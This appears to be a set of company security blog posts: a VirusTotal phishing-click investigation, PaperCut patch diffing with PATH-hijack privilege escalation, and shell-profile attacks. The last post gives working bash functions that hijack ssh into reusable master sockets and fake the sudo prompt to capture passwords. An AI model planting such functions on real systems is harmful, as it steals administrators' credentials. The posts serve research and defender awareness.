Who’s watching your VirusTotal submissions?

Phishing testing is often a part of a company’s security training, and conducting frequent phishing tests is part of our security program here at Code42. As part of those tests, we monitor both click rates and reporting rates, as we consistently message our employees to report any suspicious-looking emails to the security team. So when the most recent phishing test report from our vendor KnowBe4 included three clicks from IPs in China, it resulted in an investigation that ultimately uncovered some interesting consequences of using public security scanners.

All three users said that they hadn’t clicked on the link in the phishing test, and all three did report the email as expected. Although having a user click on a link after they submit it as suspicious is possible, it’s not a typical behavior pattern that we see. Plus, due to the security culture at Code42, most users willingly own up to clicking on links in emails, so we really had no reason to doubt that the users weren’t being honest when they said they didn’t click on anything. That did present a puzzle, however: how could a personalized link from KnowBe4 that exists only in the phishing test email make its way to some IP address in China, and was that indicative of something malicious? Seeing no immediate answers, the SOC team started digging in.

When coming up with possible explanations for how this URL could end up outside of the user’s account, we brainstormed several threat vectors:

  • The obvious one is malware, in this case a type of malware on the endpoint that scrapes URLs in emails or otherwise provides remote access that could be leveraged for extracting data from an email account. That’s not impossible, but the thought of somebody leveraging such access to grab a URL from an email and not, say, deploy ransomware seemed unlikely.
  • A fake OAuth application: these are apps that look legitimate and connect to your online accounts via OAuth, requesting permissions like reading your email in your Office365 or Google accounts. These are becoming more and more prevalent so this was a serious option to consider.
  • Another possibility was a malicious browser extension that could grab data from a Google Mail page. This is also becoming an issue that security teams need to keep in mind as part of their threat model.
  • Finally, we considered that our own security tools or processes may have triggered some unintended side effects that led to this behavior.

It turned out that the last one was the culprit! But before moving onto the explanation, a few words about investigating the other options. An EDR tool would be most useful for investigating the malware scenario. Viewing connected apps in your cloud provider’s admin console is one way to try and find suspicious OAuth apps, as is monitoring your log event stream and capturing all new OAuth permission adds as they happen. As for browser extensions, a tool like OSQuery can be used to enumerate extensions and help identify any that look odd.

But in this case, it was our own security tools that led to the odd clicks. At Code42, we use Palo Alto Cortex XSOAR as our SOAR platform, and one of our key automation playbooks is handling emails that users send to our SOC team. We build into that playbook an automated response for people who submit phishing tests thanking them for the submission and keeping track of who reported the email for those aforementioned metrics. However, sometimes the email is forwarded in such a way that the playbook logic can’t automatically determine that it is part of a phishing exercise. When that happens, it goes through the normal investigation workflow, including sending URLs to services like urlscan.io and VirusTotal. Ultimately, it was determined that it was the latter service that led to the recorded click event, but how did we get there?

First, we started with a standard tactic: seeing if those suspicious IPs were seen anywhere else besides the URL click. When we looked for other traffic from those IPs in our logs, we did find a few events. They were to URLs on webservers that we control and hence log, and they were largely pretty innocuous events: HTTP requests to static pages, support articles, and so forth. Digging into one particularly personalized URL, though, we found that not only had the suspicious IP visited it, but so had a number of other IPs, including IPs from Google, DigitalOcean, and Palo Alto Networks. Taking a close look at the user agents for some of those events uncovered that the sequence of events always appeared to start with a Google IP, one that included “appid: s~virustotalcloud” in the user agent string. Once we saw this, things began to fall into place.

We discovered a pretty consistent pattern: the VirusTotal HTTP request came first, then over a period of 24–36 hours, other IPs would make HTTP requests to the same URL. For some of these URLs, they were very long and had arbitrary data added, so the only logical source could have been the original VirusTotal HTTP request. In other words, it looked like organizations were ingesting all VirusTotal URL submissions via API and visiting those URLs themselves to (likely) do their own analysis.

For some of the source IPs, this explanation made a lot of sense: VirusTotal does have a robust API, including a feed of all submitted URLs. Other security vendors use this data as an input into their own tooling to add additional context. But some of the traffic indicated that unknown non-security actors were doing the same thing.

At least, that was the hypothesis we had put together. The next step was to test it, and so we generated a fake, easily-trackable URL that was on a domain we controlled. We submitted it to VirusTotal and sat back to wait for the results. And sure enough, we saw the same pattern once again:

HTTP requests

The first HTTP requests came from VirusTotal. As before, Palo Alto, Digital Ocean, and AWS showed up. But so did curious networks like “Orange Polska Spolka Akcyjna” and “Vysokie tehnologii Limited Liability Company”. Finally, at the end, the network we saw in our phishing exercise, “Guangdong Mobile Communication Co.Ltd.” appeared as if on schedule. That traffic consistently has a user agent string of “okhttp/3.12.13”, which also matched up with the phishing reporting dashboard “Generic Browser” data point for the browser that registered the phishing link click.

In the end, we felt our hypothesis was confirmed and that the clicks were neither user-initiated or malicious. We also followed up with KnowBe4 and learned that we can remove those non-user-initiated clicks to ensure that our reporting is 100% accurate. But it served as a great reminder that when you use a tool like VirusTotal as part of your investigation, you don’t control who sees what you are submitting, and they may decide to take their own look at what you are sharing. More importantly, when you see strange activity in a phishing exercise, remember to “assume breach” but realize there are other explanations out there too!

Death By a Thousand Papercuts


Patch diffing major releases


From time to time our pentest team reviews software that we are either using or interested in acquiring. That was the case with Papercut, a multifunction printer/scanner management suite for enterprise printers. The idea behind Papercut is pretty neat, a user can submit a print job to a Papercut printer, and walk to any physical printer they are nearby and release the print job. Users don’t have to select from dozens of printers and hope they get the right one. Pretty neat! It does a lot of other stuff too, but you get the point, it’s for printing 🙂


Typically when starting an application security assessment I’ll start by searching for previous exploitable vulnerabilities released by other researchers. In the case of Papercut there was only one recent CVE I could find without much detail. CVE-2019–12135 stated “An unspecified vulnerability in the application server in Papercut MF and NG versions 18.3.8 and earlier and versions 19.0.3 and earlier allows remote attackers to execute arbitrary code via an unspecified vector.”


I don’t like unspecified vulnerabilities! However, this was a good opportunity to do some patch diffing, and general security research on the product. The purpose of this article will be to guide someone in attempting major release patch diffing to find an undisclosed or purposely opaque vulnerability.


Before diving into the patch diffing we also wanted to get an idea of how the application generally behaves.


Typically I’ll look for services and processes related to the target, and what those binaries try to load. Our first finding which was relatively easy to uncover was that the mobility-print.exe process attempts to load ps2pdf.exe, cmd, bat, and vbs from the windows PATH environment variable. As a developer its important to realize that this is something that could potentially be modified, which you have no control over. So loading arbitrary files from an untrusted path is not a good idea.

mobility-print.exe loading files from the PATH variable


After this finding we created a simple POC which spawned calc.exe from a path environment variable. In our case, a SQL server installation which was part of our Papercut install allowed for an unprivileged user to privilege escalate to SYSTEM due to F:\Program Files having the NTFS special permissions to write/append data.

POC bat file that spawns calc.exe
Calc.exe spawned as SYSTEM

First vulnerability down! That was easy, although it’s far from remote code execution… from the perspective of insider risk, a malicious insider with user level access to the print server could take over the print server with this vulnerability. We reported this vulnerability to Papercut and the newest release has this issue patched.


If you’ve done patch diffing of DLLs or binaries before, you know the important thing is to get the most recent version before the patch, and the version immediately after the patch. Typically a tool like BinDiff is used for comparing the patches. Unfortunately, Papercut doesn’t allow us to download a patch for their undisclosed RCE vulnerability, so the best we can do is download the point release before the vulnerability, and the point release with the patch. Unfortunately, that means that there will be a large number of updated files and the patch will be difficult to find. I made an educated guess that the remote code execution vulnerability would be an insecure deserialization vulnerability simply based on the fact that there were a lot of jar files included in the installer. The image below shows a graphical diffing view of the Papercut folder structure. The important thing here is that purple represents files that have been added.


Here we see a lot of class files added that didn’t exist before… with a lot of extraneous data filtered out.

After diffing the point release and seeing that SecureSerializationFilter was added to the codebase, the next step we took was to see where the new class is leveraged (hint it’s during serialization and deserialization of print jobs). With this information we can craft an attack payload against unpatched versions in the form of a print job.


Finally looking at the class path of the server we can see that Apache Commons Collection is included, so a Ysoserial payload should work for achieving RCE. We’ve achieved the goal of understanding the underlying root cause of the vulnerability even though the vendor did not provide any useful information in understanding the issue. But in a perfect world the vendor would have shared this information in the first place!


As a side note Papercut is one of many vendors who leverage third party libraries. MFP software represents an interesting target in that there are typically large numbers of file format parsers involved in translating image file formats and office document file formats into a format that many printers understand. Third party libraries often are leveraged for this and some may not be as vetted or secure when compared to a Microsoft developed library.

Privilege Escalation leveraging shell profiles

The title may not sound like it but I promise, I’m not on the Red Team. However, as a systems administrator I do think that poking around at the tools available on the systems you manage is a good way to learn about what precautions need to be made when standing up new services and defining new security policies. Tom Bolen, one of our Red Team staff, wrote about the ability to leverage command aliases set in users’ shell profiles to setup ssh connections in master mode. This allows an attacker to start a separate ssh session using a previously authenticated connection. It’s a fantastic post, give it a read if you haven’t already.

Looking at how his attack was carried out, I thought that the number of users leveraging aliases for ssh connections would limit how viable that attack would be. It would be better (or uh… worse?) if we could intercept all ssh commands and rewrite them as a master ssh connection. I asked Tom if it would be possible to modify the commands given by the user before they were sent to the shell. Like an alias, but for all ssh commands given by the end user. He answered, “Yep! the configuration file executes as a shell script so anything that you could run in a shell script you can run in there.”

These shell configuration files running as a script instead of just establishing a few variables makes the output significantly easier to manipulate. It allows me the ability to have functions handle the input and output.

Automating attacks from the shell profile

While it’s not too complicated to write a function to rewrite the command sent to the shell, the hard part is getting a user to run it. Turns out, functions defined in the shell configuration files are executed before the actual binaries in the filesystem(/bin,/sbin,/usr/bin,/usr/sbin). All we need to do is name the function the same as the binary that the user wants to call, and it will be executed in place of the binary that the user intended the command for.

ssh () {
args=$@
arr=($args)
arr_len=${#arr[@]}
un_sys=${arr[arr_len-1]}
socket="/tmp/$RANDOM-$un_sys"
bash -c "/usr/bin/ssh -M -S $socket $args"
}

This is a simple ssh function that will record the connection arguments that the user provided, generate a name for a temp socket based on the connection being made, and pass a new command to the actual ssh binary to be executed. The user gets the ssh session, the attacker gets an authenticated socket to ssh to the server separately.

Now that we have a function, where do we attack from? If you only have access to a user session then add your function to ~/.bashrc (or equivalent for alternative shells, e.g. ~/.zshrc). If you have root access, adding the function to /etc/bash.bashrc loads the function in the interactive session for all users. One thing to keep in mind here is these examples are written for bash. The syntax will likely differ from shell to shell.

Bringing my findings back to Tom, he brought up another potential attack where this method might be useful. His idea was stealing user passwords entered via sudo. For a basic version, it’s not too difficult.

sudo () {
args=$@
read -p "[sudo] password for $USER: " pw
echo $pw | /usr/bin/sudo -S $args
}

The problem is, this does not act the same way as the actual authentication prompt. I would hope that even the newest linux users would be raising questions as to why their password is being shown in the clear when authenticating here. To effectively pull this off, we’ll need to mimic the same behavior as sudo would present to the user.

Let’s set the criteria:

  1. The user can’t see their password being typed in.
  2. The malicious code should not prompt when sudo has already been authenticated and is still within the timeout window.
  3. The user can’t be shown any prompts that differ in formatting from the actual sudo command output.
sudo () {
# Capture args as formatted
args=$@
# Check if shell is already authenticated
/usr/bin/sudo -n true &>/dev/null
if [ $? -eq 1 ]; then
# Capture Password
stty -echo
read -p "[☠ sudo] password for $USER: " pw
echo ""
# Authenticate to sudo silently
echo $pw | /usr/bin/sudo -S true &>/dev/null
# Pass commands to sudo
/usr/bin/sudo $args
stty echo
else
/usr/bin/sudo $args
fi
}

The first issue was pretty easy to solve. Issuing the command stty -echo turns off echoing the user input to the terminal, hiding the password.

The second issue was a bit tougher, but was solved by issuing a command to sudo with the -n flag set, disabling any password prompt. This would either fail or succeed based on if sudo had already been authenticated to and was still within the timeout window. Using the exit status of 0 or 1 of that command determined whether or not to give the user the password prompt.

I ran into issues in some VMs where taking the password from stdin (standard input) still showed the password prompt. To get around this, I added echo $pw | /usr/bin/sudo -S true &>/dev/null to authenticate to sudo with the user password while redirecting all output to null. This allowed me to authenticate sudo then pass the actual arguments from the user to /usr/bin/sudo without needing to authenticate again.

Testing this against a lab VM, resulted in sudo commands executing successfully and storing the password as a variable to be used or exported as needed by an attacker.

Image for post

Using both the functions documented here, lays out a pretty simple attack path to go from persistence in a user session to root access on critical server infrastructure. While the flexibility of these configuration files make working with servers via the command line easier, it also opens us up to attackers inserting malicious code to pivot around the network stealing administrator credentials.

Not to leave the Blue Team empty handed, keep an eye out for my next post where we will look into mitigating these types of attacks in your environment.